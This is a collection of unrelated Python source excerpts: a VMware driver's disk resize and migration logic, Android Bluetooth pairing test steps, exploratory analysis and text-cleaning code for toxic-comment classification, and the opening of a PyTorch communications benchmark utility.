folder = ds_obj.DatastorePath.parse(vmdk.path).dirname
datastore = ds_obj.DatastorePath.parse(vmdk.path).datastore
resized_disk = str(ds_obj.DatastorePath(datastore, folder,
'resized.vmdk'))
ds_util.disk_copy(self._session, dc_info.ref, vmdk.path,
str(resized_disk))
self._extend_virtual_disk(instance, root_disk_in_kb, resized_disk,
dc_info.ref)
self._volumeops.detach_disk_from_vm(vm_ref, instance, vmdk.device)
original_disk = str(ds_obj.DatastorePath(datastore, folder,
'original.vmdk'))
ds_util.disk_move(self._session, dc_info.ref, vmdk.path,
original_disk)
ds_util.disk_move(self._session, dc_info.ref, resized_disk,
vmdk.path)
self._volumeops.attach_disk_to_vm(vm_ref, instance,
vmdk.adapter_type,
vmdk.disk_type, vmdk.path)
def _remove_ephemerals_and_swap(self, vm_ref):
devices = vm_util.get_ephemerals(self._session, vm_ref)
swap = vm_util.get_swap(self._session, vm_ref)
if swap is not None:
devices.append(swap)
if devices:
vm_util.detach_devices_from_vm(self._session, vm_ref, devices)
def _resize_create_ephemerals_and_swap(self, vm_ref, instance,
block_device_info):
vmdk = vm_util.get_vmdk_info(self._session, vm_ref,
uuid=instance.uuid)
if not vmdk.device:
LOG.debug("No root disk attached!", instance=instance)
return
ds_ref = vmdk.device.backing.datastore
datastore = ds_obj.get_datastore_by_ref(self._session, ds_ref)
dc_info = self.get_datacenter_ref_and_name(ds_ref)
folder = ds_obj.DatastorePath.parse(vmdk.path).dirname
self._create_ephemeral(block_device_info, instance, vm_ref,
dc_info, datastore, folder, vmdk.adapter_type)
self._create_swap(block_device_info, instance, vm_ref, dc_info,
datastore, folder, vmdk.adapter_type)
def migrate_disk_and_power_off(self, context, instance, dest, flavor):
"""Transfers the disk of a running instance in multiple phases, turning
off the instance before the end.
"""
vm_ref = vm_util.get_vm_ref(self._session, instance)
vmdk = vm_util.get_vmdk_info(self._session, vm_ref,
uuid=instance.uuid)
boot_from_volume = compute_utils.is_volume_backed_instance(context,
instance)
# Checks if the migration needs a disk resize down.
if (not boot_from_volume and (
flavor.root_gb < instance.flavor.root_gb or
(flavor.root_gb != 0 and
flavor.root_gb < vmdk.capacity_in_bytes / units.Gi))):
reason = _("Unable to shrink disk.")
raise exception.InstanceFaultRollback(
exception.ResizeError(reason=reason))
# 0. Zero out the progress to begin
self._update_instance_progress(context, instance,
step=0,
total_steps=RESIZE_TOTAL_STEPS)
# 1. Power off the instance
vm_util.power_off_instance(self._session, instance, vm_ref)
self._update_instance_progress(context, instance,
step=1,
total_steps=RESIZE_TOTAL_STEPS)
def confirm_migration(self, migration, instance, network_info):
"""Confirms a resize, destroying the source VM."""
vm_ref = vm_util.get_vm_ref(self._session, instance)
vmdk = vm_util.get_vmdk_info(self._session, vm_ref,
uuid=instance.uuid)
if not vmdk.device:
return
ds_ref = vmdk.device.backing.datastore
dc_info = self.get_datacenter_ref_and_name(ds_ref)
folder = ds_obj.DatastorePath.parse(vmdk.path).dirname
datastore = ds_obj.DatastorePath.parse(vmdk.path).datastore
original_disk = ds_obj.DatastorePath(datastore, folder,
'original.vmdk')
ds_browser = self._get_ds_browser(ds_ref)
if ds_util.file_exists(self._session, ds_browser,
original_disk.parent,
original_disk.basename):
ds_util.disk_delete(self._session, dc_info.ref,
str(original_disk))
def _revert_migration_update_disks(self, vm_ref, instance, vmdk,
block_device_info):
ds_ref = vmdk.device.backing.datastore
dc_info = self.get_datacenter_ref_and_name(ds_ref)
folder = ds_obj.DatastorePath.parse(vmdk.path).dirname
datastore = ds_obj.DatastorePath.parse(vmdk.path).datastore
original_disk = ds_obj.DatastorePath(datastore, folder,
'original.vmdk')
ds_browser = self._get_ds_browser(ds_ref)
if ds_util.file_exists(self._session, ds_browser,
original_disk.parent,
original_disk.basename):
self._volumeops.detach_disk_from_vm(vm_ref, instance,
vmdk.device)
ds_util.disk_delete(self._session, dc_info.ref, vmdk.path)
ds_util.disk_move(self._session, dc_info.ref,
str(original_disk), vmdk.path)
self._volumeops.attach_disk_to_vm(vm_ref, instance,
vmdk.adapter_type,
vmdk.disk_type, vmdk.path)
# Reconfigure ephemerals
self._remove_ephemerals_and_swap(vm_ref)
self._resize_create_ephemerals_and_swap(vm_ref, instance,
block_device_info)
def finish_revert_migration(self, context, instance, network_info,
block_device_info, power_on=True):
"""Finish reverting a resize."""
vm_ref = vm_util.get_vm_ref(self._session, instance)
# Ensure that the VM is off
vm_util.power_off_instance(self._session, instance, vm_ref)
client_factory = self._session.vim.client.factory
# Reconfigure the VM properties
extra_specs = self._get_extra_specs(instance.flavor,
instance.image_meta)
metadata = self._get_instance_metadata(context, instance)
vm_resize_spec = vm_util.get_vm_resize_spec(
client_factory,
int(instance.flavor.vcpus),
int(instance.flavor.memory_mb),
extra_specs,
metadata=metadata)
vm_util.reconfigure_vm(self._session, vm_ref, vm_resize_spec)
vmdk = vm_util.get_vmdk_info(self._session, vm_ref,
uuid=instance.uuid)
if vmdk.device:
self._revert_migration_update_disks(vm_ref, instance, vmdk,
block_device_info)
# Relocate the instance back, if needed
if instance.uuid not in self.list_instances():
# Get the root disk vmdk object's adapter type
adapter_type = vmdk.adapter_type
self._detach_volumes(instance, block_device_info)
LOG.debug("Relocating VM for reverting migration",
instance=instance)
try:
self._relocate_vm(vm_ref, context, instance, network_info)
LOG.debug("Relocated VM for reverting migration",
instance=instance)
except Exception as e:
with excutils.save_and_reraise_exception():
LOG.error("Relocating the VM failed: %s", e,
instance=instance)
else:
self.update_cluster_placement(context, instance)
finally:
self._attach_volumes(instance, block_device_info, adapter_type)
if power_on:
vm_util.power_on_instance(self._session, instance)
def | |
a pair request. It searches for the device name, clicks on it and assures
that the initiator device is in the pairing request window (i.e. if pair request window
is not displayed on the screen, it checks if the "Cannot communicate" message is displayed,
and checks device name paired or not to DUT, If paired returns true)
Usage:
bluetooth_steps.PairDevice(serial=serial, dev_to_pair_name="Name",
scan_timeout=60000, scan_max_attempts=1, version=version)()
"""
def __init__(self, dev_to_pair_name, scan_timeout=60000, scan_max_attempts=1, **kwargs):
"""
:param dev_to_pair_name: name of device to pair with
:param scan_timeout: maximum timeout for scanning progress
:param scan_max_attempts: maximum no. of scan tries till the device is found
:param kwargs: serial, version, timeout, no_log and standard kwargs for base_step
"""
BtStep.__init__(self, **kwargs)
self.dev_to_pair_name = dev_to_pair_name
self.scan_timeout = scan_timeout
self.scan_max_attempts = scan_max_attempts
self.step_data = True
self.set_passm("Paired with " + str(dev_to_pair_name))
def do(self):
try:
# search for required device
if not BtSearchDevices(serial=self.serial, dev_to_find=self.dev_to_pair_name,
scan_timeout=self.scan_timeout,
timeout=self.timeout, max_attempts=self.scan_max_attempts, version=self.version,
critical=False)():
raise Exception("Search for device failed")
# click on the device name (already scrolled in the view)
self.uidevice(text=self.dev_to_pair_name).click()
if self.version.startswith("5."):
# LLP version
# if pair request window not appear on the device, open notification and check
# if there is not even there the pairing request
if not self.uidevice(resourceId="android:id/alertTitle",
text="Bluetooth pairing request").wait.exists(timeout=5000):
if self.uidevice(textContains="Can't communicate with").exists:
raise Exception(
"Pair request not initiated from DUT because can't communicate with other one device")
else:
# M, N version
# if pair request window not appear on the device, open notification and check
# if there is not even there the pairing request
pair_request_title_obj = self.uidevice(resourceId="android:id/alertTitle", textContains="Pair with")
if not pair_request_title_obj.wait.exists(timeout=5000):
if self.uidevice(textContains="Can't communicate with").exists:
raise Exception(
"Pair request not initiated from DUT because can't communicate with other one device")
except Exception, e:
self.set_errorm("Pair request to " + str(self.dev_to_pair_name), e.message)
self.step_data = False
def check_condition(self):
"""
:return: True if Device was paired, False if not
"""
if self.step_data:
# check if is paired with required device
self.step_data = CheckIfPaired(serial=self.serial, dev_paired_with=self.dev_to_pair_name, paired=True,
timeout=self.timeout, version=self.version, critical=False)()
return self.step_data
class ReceivePairRequest(BtStep):
""" Description:
Receives a pair request. It assures that device is
in the pairing request window (i.e. if pair request window
is not received on the screen, it searches it in the
notifications menu)
Usage:
bluetooth_steps.ReceivePairRequest(serial=serial,
dev_receiving_from_name="Name", version=version)()
"""
def __init__(self, dev_receiving_from_name, **kwargs):
"""
:param dev_receiving_from_name: name of the device receiving pair request from
:param kwargs: serial, version, timeout, no_log and standard kwargs for base_step
"""
BtStep.__init__(self, **kwargs)
self.dev_receiving_from_name = dev_receiving_from_name
self.step_data = True
self.set_passm("Pair request received from " + str(self.dev_receiving_from_name))
def do(self):
try:
if self.version.startswith("5."):
# LLP version
# if pair request window not appear on the receiver device, open notification and check if
# there is not even there the pairing request
if not self.uidevice(resourceId="android:id/alertTitle", text="Bluetooth pairing request").wait.exists(
timeout=5000):
if not SearchPairRequestNotification(serial=self.serial, timeout=self.timeout, version=self.version,
critical=False)():
raise Exception(
"Pair request not received on the screen, also failed" +
" searching it in notifications menu")
if not WaitPairRequest(serial=self.serial, appear=True, time_to_wait=self.timeout,
version=self.version, critical=False)():
raise Exception("Pair request not received")
if not self.uidevice(resourceId="com.android.settings:id/message_subhead",
text=self.dev_receiving_from_name).wait.exists(timeout=self.timeout):
raise Exception("Pair request not received from the expected device")
else:
# M, N version
# if pair request window not appear on the receiver device, open notification and check if
# there is not even there the pairing request
pair_request_title_obj = self.uidevice(resourceId="android:id/alertTitle", textContains="Pair with")
if not pair_request_title_obj.wait.exists(timeout=5000):
if not SearchPairRequestNotification(serial=self.serial, timeout=self.timeout, version=self.version,
critical=False, no_log=True)():
raise Exception(
"Pair request not received on the screen, also failed" +
" searching it in notifications menu")
if not WaitPairRequest(serial=self.serial, appear=True, time_to_wait=self.timeout,
verion=self.version, critical=False, no_log=True)():
raise Exception("Pair request not received on device")
pair_request_title_str = pair_request_title_obj.text
if not pair_request_title_str == "Pair with " + str(self.dev_receiving_from_name) + "?":
raise Exception(
"Pair request not received from the expected device, found " + str(pair_request_title_str))
except Exception, e:
self.set_errorm("Pair request from " + str(self.dev_receiving_from_name), e.message)
self.step_data = False
def check_condition(self):
"""
:return: True if Both devices are in the pair request window, False otherwise
"""
return self.step_data
class SearchPairRequestNotification(BtStep):
""" Description:
Opens a Pairing request from the notification menu. Note that
this does not check if, indeed the pairing request dialog appears,
it only clicks the notification. Call this only if the request
dialog is not displayed and it should be
Usage:
bluetooth_steps.SearchPairRequestNotification(serial=serial)()
"""
def __init__(self, **kwargs):
"""
:param kwargs: serial, no_log and standard kwargs for base_step
"""
BtStep.__init__(self, **kwargs)
self.step_data = True
self.set_passm("Pairing request notification clicked")
def do(self):
try:
# open notification menu
if not OpenNotificationsMenu(serial=self.serial, timeout=self.timeout, version=self.version, critical=False,
no_log=True)():
raise Exception("Notification menu not opened when searching for pairing request")
# click on the pairing request notification
if not BtCheckNotificationAppear(serial=self.serial, text_contains="Pairing request",
click_on_notification=True, time_to_appear=self.timeout,
version=self.version, critical=False, no_log=True)():
raise Exception("Check Pair request notification not successful")
except Exception, e:
self.set_errorm("Search pair request in notifications ", e.message)
self.step_data = False
def check_condition(self):
"""
:return: True if Pair request notification was found and clicked, False otherwise
"""
return self.step_data
class OpenNotificationsMenu(BtStep):
""" Description:
Opens the notifications menu in order to operate with Bluetooth notifications
Usage:
bluetooth_steps.OpenNotificationsMenu(serial=serial)()
"""
def __init__(self, **kwargs):
"""
:param kwargs: serial, timeout, no_log and standard kwargs for base_step
"""
BtStep.__init__(self, **kwargs)
self.set_passm("Notifications menu opened")
self.set_errorm("Open notifications", "Notifications menu not opened")
def do(self):
self.uidevice.open.notification()
# sleep here for transition to be finished
time.sleep(2)
def check_condition(self):
"""
:return: True if Notifications menu was opened, False otherwise
"""
self.step_data = self.uidevice(resourceId="com.android.systemui:id/notification_stack_scroller").wait.exists(
timeout=self.timeout)
# self.step_data = True
return self.step_data
class CloseNotificationsMenu(BtStep):
""" Description:
Closes the notifications menu
Usage:
bluetooth_steps.CloseNotificationsMenu(serial=serial)()
"""
def __init__(self, **kwargs):
"""
:param kwargs: serial, timeout, no_log and standard kwargs for base_step
"""
BtStep.__init__(self, **kwargs)
self.step_data = True
self.notifications_menu = self.uidevice(resourceId="com.android.systemui:id/notification_stack_scroller")
self.set_passm("Notifications menu closed")
self.set_errorm("Close notifications", "Notifications menu not gone")
def do(self):
try:
if not self.notifications_menu.exists:
raise Exception("Notifications menu is not already opened")
self.uidevice.press.back()
except Exception, e:
self.set_errorm("Close notifications", e.message)
self.step_data = False
def check_condition(self):
"""
:return: True if Notifications menu was closed, False otherwise
"""
if self.step_data:
self.step_data = self.notifications_menu.wait.gone(timeout=self.timeout)
return self.step_data
class PerformActionPairRequest(BtStep):
""" Description:
Performs a click on the button with label exact text as defined by
action parameter and checks if the pair request window is gone. If
the action is 'Timeout', it only waits for pair request window to be
gone, the amount of time as defined by timeout parameter. Call this
only when Pair request window is already shown
Usage:
bluetooth_steps.PerformActionPairRequest(serial=serial,
action="Pair", version=version)()
"""
def __init__(self, action="Pair", **kwargs):
"""
:param action: "Pair"/"Cancel"/"Timeout" action to be performed
:param kwargs: serial, timeout, version, no_log, and standard kwargs for base_step
"""
BtStep.__init__(self, **kwargs)
if action not in ["Cancel", "Pair", "Timeout"]:
raise Exception("Config error: not any expected value for action")
if self.version.startswith("5.") or self.version.startswith("6.0"):
# LLP, M versions
self.action = action
else:
# N version
self.action = action.upper()
self.step_data = True
self.set_passm("Action " + str(self.action) + " successful")
self.set_errorm("Action " + str(self.action), "Pair request window not gone after action performed")
def do(self):
try:
# if action is not Timeout, perform click on the button
if self.action.upper() != "TIMEOUT":
action_button = self.uidevice(text=self.action)
if not action_button.wait.exists(timeout=self.timeout + 30000):
raise Exception("Button " + str(self.action) + " not found")
action_button.click()
if self.uidevice(text="YES").wait.exists(timeout=1000):
self.uidevice(text="YES").click()
except Exception, e:
self.set_errorm("Action " + str(self.action), e.message)
self.step_data = False
def check_condition(self):
"""
:return: True if pair request window is gone, False if not
"""
if self.step_data:
# check if the pair request window is gone
self.step_data = WaitPairRequest(serial=self.serial, appear=False, time_to_wait=self.timeout,
version=self.version, critical=False)()
return self.step_data
class CouldNotPairDialogCheck(BtStep):
""" Description:
Checks if the "Couldn't pair" dialog is displayed
(by waiting for it) and clicks on it's OK button.
Usage:
bluetooth_steps.CouldNotPairDialogCheck(serial=serial)()
"""
def __init__(self, **kwargs):
"""
:param kwargs: serial, timeout, no_log and standard kwargs for base_step
"""
BtStep.__init__(self, **kwargs)
self.step_data = True
self.set_passm("Dialog appeared, canceled successful")
self.set_errorm("Could not pair dialog", "Not canceled successfully")
self.dialog_window = self.uidevice(resourceId="android:id/message", textContains="incorrect PIN or passkey")
def do(self):
try:
if self.device_info.dessert < "O":
# wait for dialog to appear
if not self.dialog_window.wait.exists(timeout=self.timeout + 30000):
raise Exception("Dialog not appeared")
# click on it's OK button
ok_button = self.uidevice(text="OK")
if not ok_button.wait.exists(timeout=self.timeout + 30000):
raise Exception("OK not found in the dialog")
ok_button.click()
else:
pass
| |
<reponame>zequeira/Toxic-Comment-Classification
import re
import string
import itertools
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
from nltk.corpus import stopwords
from wordcloud import WordCloud, STOPWORDS
from wordsegment import load, segment
load()
plt.style.use("seaborn-pastel")
def category_percentage(df):
df['clean'] = np.where(
(df['toxic'] == 0) & (df['severe_toxic'] == 0) & (df['obscene'] == 0) & (df['threat'] == 0) & (
df['insult'] == 0) & (df['identity_hate'] == 0), 1, 0)
categories = ['toxic', 'severe_toxic', 'obscene', 'threat',
'insult', 'identity_hate', 'clean']
plot_data = df[categories].mean() * 100
plt.figure(figsize=(10, 5))
plt.title("percentage records by category")
sns.barplot(x=plot_data.index, y=plot_data.values)
plt.show()
return
def label_count(df):
label_columns = df.columns.tolist()[2:8]
categories = ['toxic', 'severe_toxic', 'obscene', 'threat',
'insult', 'identity_hate', 'clean']
plot_data = df[categories].sum()
plt.figure(figsize=(10, 5))
plt.title("Number of comments per category")
sns.barplot(x=plot_data.index, y=plot_data.values)
plt.show()
plt.figure(figsize=(10, 5))
df[label_columns].sum().sort_values().plot(kind='barh')
print(df[label_columns].sum().sort_values())
plt.show()
return
def text_length_across_classes(df):
df['comment_length'] = df['comment_text'].apply(lambda x: len(x.split()))
median_text_len = []
mean_text_len = []
min_text_len = []
max_text_len = []
max_distinct_tokens = []
for i in ['toxic', 'severe_toxic', 'obscene', 'threat', 'insult', 'identity_hate']:
mean_text_len.append(df[df[i] == 1]['comment_length'].mean())
min_text_len.append(df[df[i] == 1]['comment_length'].min())
max_text_len.append(df[df[i] == 1]['comment_length'].max())
median_text_len.append(df[df[i] == 1]['comment_length'].median())
df['distinct_tokens'] = df['comment_text'].apply(lambda x: len(set(x.split())))
max_distinct_tokens.append(df[df[i] == 1]['distinct_tokens'].max())
mean_text_len.append(df[(df['toxic'] == 0) & (df['severe_toxic'] == 0) & (df['obscene'] == 0) & (
df['threat'] == 0) & (df['insult'] == 0) & (df['identity_hate'] == 0)]['comment_length'].mean())
min_text_len.append(df[(df['toxic'] == 0) & (df['severe_toxic'] == 0) & (df['obscene'] == 0) & (
df['threat'] == 0) & (df['insult'] == 0) & (df['identity_hate'] == 0)]['comment_length'].min())
max_text_len.append(df[(df['toxic'] == 0) & (df['severe_toxic'] == 0) & (df['obscene'] == 0) & (
df['threat'] == 0) & (df['insult'] == 0) & (df['identity_hate'] == 0)]['comment_length'].max())
median_text_len.append(df[(df['toxic'] == 0) & (df['severe_toxic'] == 0) & (df['obscene'] == 0) & (
df['threat'] == 0) & (df['insult'] == 0) & (df['identity_hate'] == 0)]['comment_length'].median())
max_distinct_tokens.append(df[(df['toxic'] == 0) & (df['severe_toxic'] == 0) & (df['obscene'] == 0) & (
df['threat'] == 0) & (df['insult'] == 0) & (df['identity_hate'] == 0)]['distinct_tokens'].max())
fig, axes = plt.subplots(2, 2, figsize=(18, 10))
sns.barplot(ax=axes[0, 0], x=['toxic', 'severe_toxic', 'obscene', 'threat', 'insult', 'identity_hate', 'clean'],
y=median_text_len)
axes[0, 0].set_title('median text length')
sns.barplot(ax=axes[0, 1], x=['toxic', 'severe_toxic', 'obscene', 'threat', 'insult', 'identity_hate', 'clean'],
y=min_text_len)
axes[0, 1].set_title('minimum text length')
sns.barplot(ax=axes[1, 0], x=['toxic', 'severe_toxic', 'obscene', 'threat', 'insult', 'identity_hate', 'clean'],
y=max_text_len)
axes[1, 0].set_title('max text length')
sns.barplot(ax=axes[1, 1], x=['toxic', 'severe_toxic', 'obscene', 'threat', 'insult', 'identity_hate', 'clean'],
y=max_distinct_tokens)
axes[1, 1].set_title('max distinct tokens')
fig.suptitle('text length statistics')
plt.show()
return
def corr_between_labels(df):
plt.figure(figsize=(15, 8))
plt.title("correlation between toxic categories")
sns.heatmap(df.corr(), cmap='YlGnBu', annot=True)
plt.show()
return
## Gram statistics
def gram_analysis(data, gram):
stop_words_set = set(stopwords.words('english'))
tokens = [t for t in data.lower().split(" ") if t != "" if t not in stop_words_set]
ngrams = zip(*[tokens[i:] for i in range(gram)])
final_tokens = [" ".join(z) for z in ngrams]
return final_tokens
def gram_freq(df, gram, categ_col, text_col):
category_text = " ".join(df[df[categ_col] == 1][text_col].sample(200).values)
toks = gram_analysis(category_text, gram)
tok_freq = pd.DataFrame(data=[toks, np.ones(len(toks))]).T.groupby(0).sum().reset_index()
tok_freq.columns = ['token', 'frequency']
tok_freq = tok_freq.sort_values(by='frequency', ascending=False)
plt.figure(figsize=(10, 8))
plt.title("{} most common tokens".format(categ_col))
sns.barplot(x='token', y='frequency', data=tok_freq.iloc[:30])
plt.xticks(rotation=90)
plt.show()
return
def avg_word_len_plot(df):
# word distribution across categories
df['punct_count'] = df['comment_text'].apply(lambda x: len([a for a in x if a in string.punctuation]))
df['avg_word_length'] = df['comment_text'].apply(lambda x: np.round(np.mean([len(a) for a in x.split()])))
clean = df[df['clean'] == 1].avg_word_length.value_counts().reset_index()
clean.columns = ['length', 'frequency']
print("clean comments max token length : {}".format(max(clean.length)))
clean = clean.sort_values(by='length')
plt.figure(figsize=(20, 7))
plt.title("Average word length - clean comments")
sns.barplot(x=clean.length, y=clean.frequency)
plt.xticks(rotation=90)
plt.show()
toxic = df[df['clean'] == 0].avg_word_length.value_counts().reset_index()
toxic.columns = ['length', 'frequency']
print("toxic comments max token length : {}".format(max(toxic.length)))
toxic = toxic.sort_values(by='length')
plt.figure(figsize=(20, 7))
plt.title("Average word length -toxic comments (all forms)")
sns.barplot(x=toxic.length, y=toxic.frequency)
plt.xticks(rotation=90)
plt.show()
return
def generate_wordclouds(df, text_col, categ_col):
df['clean'] = np.where(
(df['toxic'] == 0) & (df['severe_toxic'] == 0) & (df['obscene'] == 0) & (df['threat'] == 0) & (
df['insult'] == 0) & (df['identity_hate'] == 0), 1, 0)
if categ_col == 'all_toxic':
category_text = df[df['clean'] != 1][text_col].values
else:
category_text = df[df[categ_col] == 1][text_col].values
plt.figure(figsize=(15, 8))
wc = WordCloud(background_color="black",
max_words=5000,
stopwords=STOPWORDS,
collocations=False,
max_font_size=40)
wc.generate(" ".join(category_text))
plt.title("{} word cloud".format(categ_col), fontsize=20)
# plt.imshow(wc.recolor( colormap= 'Pastel1_r' , random_state=17), alpha=0.98)
plt.imshow(wc.recolor(colormap='Pastel2', random_state=17), alpha=0.98)
plt.axis('off')
plt.show()
return
# def venn_(df):
# figure, axes = plt.subplots(2, 2, figsize=(20, 20))
# toxic = set(df[df['toxic'] == 1].index)
# severe_toxic = set(df[df['severe_toxic'] == 1].index)
# obscene = set(df[df['obscene'] == 1].index)
# threat = set(df[df['threat'] == 1].index)
# insult = set(df[df['insult'] == 1].index)
# identity_hate = set(df[df['identity_hate'] == 1].index)
# clean = set(df[df['clean'] == 1].index)
#
# v1 = venn3([toxic, severe_toxic, obscene],
# set_labels=('Toxic', 'Severe toxic', 'Obscene'), set_colors=('#a5e6ff', '#3c8492', '#9D8189'),
# ax=axes[0][0])
# for text in v1.set_labels:
# text.set_fontsize(22)
# v2 = venn3([threat, insult, identity_hate],
# set_labels=('Threat', 'Insult', 'Identity hate'), set_colors=('#e196ce', '#F29CB7', '#3c81a9'),
# ax=axes[0][1])
# for text in v2.set_labels:
# text.set_fontsize(22)
# v3 = venn3([toxic, insult, obscene],
# set_labels=('Toxic', 'Insult', 'Obscene'), set_colors=('#a5e6ff', '#F29CB7', '#9D8189'), ax=axes[1][0])
# for text in v3.set_labels:
# text.set_fontsize(22)
# v4 = venn3([threat, identity_hate, obscene],
# set_labels=('Threat', 'Identity hate', 'Obscene'), set_colors=('#e196ce', '#3c81a9', '#9D8189'),
# ax=axes[1][1])
# for text in v4.set_labels:
# text.set_fontsize(22)
# plt.show()
#
# # deleting used variables
# del toxic
# del severe_toxic
# del obscene
# del threat
# del insult
# del identity_hate
# del clean
# return
def meta_data_analysis(df, text_col):
meta_df = pd.DataFrame()
meta_df['punctuations'] = df[text_col].apply(lambda x: len([a for a in str(x) if a in string.punctuation]))
meta_df['hashtags'] = df[text_col].apply(lambda x: len([a for a in x.split() if a.startswith("#")]))
meta_df['usernames'] = df[text_col].apply(lambda x: len([a for a in x.split() if a.startswith("@")]))
meta_df['stop_words'] = df[text_col].apply(lambda x: len([a for a in x.lower().split() if a in STOPWORDS]))
meta_df['upper_case_words'] = df[text_col].apply(lambda x: len([a for a in x.split() if a.isupper()]))
meta_df['urls'] = df[text_col].apply(lambda x: len([a for a in x.split() if a.startswith(tuple(['http', 'www']))]))
meta_df['word_count'] = df[text_col].apply(lambda x: len(x.split()))
meta_df['distinct_word_count'] = df[text_col].apply(lambda x: len(set(x.split())))
meta_df['clean'] = df['clean'].copy()
return meta_df
## Text cleaning
class TextCleaningUtils:
'''
This class contains implementations of various text cleaning operations (Static Methods)
'''
@staticmethod
def expand_abbreviations(text):
text = re.sub(r"he's", "he is", text)
text = re.sub(r"there's", "there is", text)
text = re.sub(r"We're", "We are", text)
text = re.sub(r"That's", "That is", text)
text = re.sub(r"won't", "will not", text)
text = re.sub(r"they're", "they are", text)
text = re.sub(r"Can't", "Cannot", text)
text = re.sub(r"wasn't", "was not", text)
text = re.sub(r"don\x89Ûªt", "do not", text)
text = re.sub(r"aren't", "are not", text)
text = re.sub(r"isn't", "is not", text)
text = re.sub(r"What's", "What is", text)
text = re.sub(r"haven't", "have not", text)
text = re.sub(r"hasn't", "has not", text)
text = re.sub(r"There's", "There is", text)
text = re.sub(r"He's", "He is", text)
text = re.sub(r"It's", "It is", text)
text = re.sub(r"You're", "You are", text)
text = re.sub(r"I'M", "I am", text)
text = re.sub(r"shouldn't", "should not", text)
text = re.sub(r"wouldn't", "would not", text)
text = re.sub(r"couldn't", "could not", text)
text = re.sub(r"i'm", "I am", text)
text = re.sub(r"I\x89Ûªm", "I am", text)
text = re.sub(r"I'm", "I am", text)
text = re.sub(r"Isn't", "is not", text)
text = re.sub(r"Here's", "Here is", text)
text = re.sub(r"you've", "you have", text)
text = re.sub(r"you\x89Ûªve", "you have", text)
text = re.sub(r"we're", "we are", text)
text = re.sub(r"what's", "what is", text)
text = re.sub(r"couldn't", "could not", text)
text = re.sub(r"we've", "we have", text)
text = re.sub(r"it\x89Ûªs", "it is", text)
text = re.sub(r"doesn\x89Ûªt", "does not", text)
text = re.sub(r"It\x89Ûªs", "It is", text)
text = re.sub(r"Here\x89Ûªs", "Here is", text)
text = re.sub(r"who's", "who is", text)
text = re.sub(r"I\x89Ûªve", "I have", text)
text = re.sub(r"y'all", "you all", text)
text = re.sub(r"can\x89Ûªt", "cannot", text)
text = re.sub(r"would've", "would have", text)
text = re.sub(r"it'll", "it will", text)
text = re.sub(r"we'll", "we will", text)
text = re.sub(r"wouldn\x89Ûªt", "would not", text)
text = re.sub(r"We've", "We have", text)
text = re.sub(r"he'll", "he will", text)
text = re.sub(r"Y'all", "You all", text)
text = re.sub(r"Weren't", "Were not", text)
text = re.sub(r"Didn't", "Did not", text)
text = re.sub(r"they'll", "they will", text)
text = re.sub(r"DON'T", "DO NOT", text)
text = re.sub(r"That\x89Ûªs", "That is", text)
text = re.sub(r"they've", "they have", text)
text = re.sub(r"they'd", "they would", text)
text = re.sub(r"i'd", "I would", text)
text = re.sub(r"should've", "should have", text)
text = re.sub(r"You\x89Ûªre", "You are", text)
text = re.sub(r"where's", "where is", text)
text = re.sub(r"Don\x89Ûªt", "Do not", text)
text = re.sub(r"i'll", "I will", text)
text = re.sub(r"weren't", "were not", text)
text = re.sub(r"They're", "They are", text)
text = re.sub(r"Can\x89Ûªt", "Cannot", text)
text = re.sub(r"you\x89Ûªll", "you will", text)
text = re.sub(r"I\x89Ûªd", "I would", text)
text = re.sub(r"let's", "let us", text)
text = re.sub(r"it's", "it is", text)
text = re.sub(r"can't", "cannot", text)
text = re.sub(r"don't", "do not", text)
text = re.sub(r"you're", "you are", text)
text = re.sub(r"i've", "I have", text)
text | |
<gh_stars>0
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
import os
import random
import sys
import time
from abc import ABC, abstractmethod
from collections import OrderedDict
from dataclasses import dataclass
from io import StringIO
import torch
from torch.autograd.profiler import record_function
random.seed()
logger = logging.getLogger(__name__)
default_master_ip = "127.0.0.1"
default_master_port = "29500"
def gracefulExit(args=0):
# TODO: Is this the best way to exit?
if args != 0:
logger.error(args)
# WARNING: Assuming sys is always used, should find a platform-independent way to gracefully exit.
sys.exit(args)
def parsesize(ipValue):
"""nccl-tests compatible input-size parsing."""
units = 0
size = 0.0
value = ""
if ipValue.find("G") != -1:
units = 1024 * 1024 * 1024
unitIdx = ipValue.find("G")
value = ipValue[0:unitIdx]
elif ipValue.find("M") != -1:
units = 1024 * 1024
unitIdx = ipValue.find("M")
value = ipValue[0:unitIdx]
elif ipValue.find("K") != -1:
units = 1024
unitIdx = ipValue.find("K")
value = ipValue[0:unitIdx]
elif ipValue.isnumeric():
units = 1
value = ipValue
else:
logger.error(f"Could not parse input size {ipValue}")
gracefulExit()
size = int(value) * units
return int(size)
def parseRankList(ipStr, ipName, comms_world_info):
rankList = [] # default empty
if ipStr:
if ipStr.isnumeric():
# single rank
rankList = [int(ipStr)]
elif ipStr.find(",") != -1:
# list of unique ranks separated by comma
rankList = list(map(int, [r.strip() for r in ipStr.split(",")]))
rankList = list(OrderedDict.fromkeys(rankList))
elif ipStr.find(":") != -1:
# a range of ranks defined by [start:end]
pos = list(map(int, [r.strip() for r in ipStr.split(":")]))
rankList = [*range(pos[0], pos[1] + 1)]
# Check if input is valid
if len(rankList) == 0 or any(
r < 0 or r >= comms_world_info.world_size for r in rankList
):
if comms_world_info.global_rank == 0:
logger.error(f"Could not parse {ipName}: {ipStr}")
gracefulExit()
return rankList
def getAlgBW(elapsedTimeNS, dataSize, numIters):
# Similar to how algorithmic bandwidth is computed in nccl-tests.
avgIterNS = 0.0
if numIters != 0:
avgIterNS = elapsedTimeNS / (numIters)
algBW = 0.0
if avgIterNS != 0:
algBW = (dataSize) / (avgIterNS) # dataSize dividied by ns gives us GBps
return (avgIterNS, algBW)
def getSizes(beginSize, endSize, stepFactor):
curSize = beginSize
numIters = 0
maxIters = 100
allSizes = []
while curSize <= endSize:
allSizes.append(curSize)
curSize = curSize * stepFactor
numIters = numIters + 1
if numIters > 100:
logger.error(
f"For finding allSizes numIters: {numIters} is greater than maxIters: {maxIters}"
)
break
return allSizes
def fixBeginSize(commsParams, world_size):
# ensures we will have atleast one member/rank
if (commsParams.collective == "all_to_all") or (
commsParams.collective == "all_to_allv"
):
if (commsParams.beginSize / commsParams.element_size) < world_size:
commsParams.beginSize = world_size * commsParams.element_size
if (
commsParams.bitwidth < 32
and (commsParams.beginSize / commsParams.element_size / world_size)
< commsParams.quant_a2a_embedding_dim
):
commsParams.beginSize = (
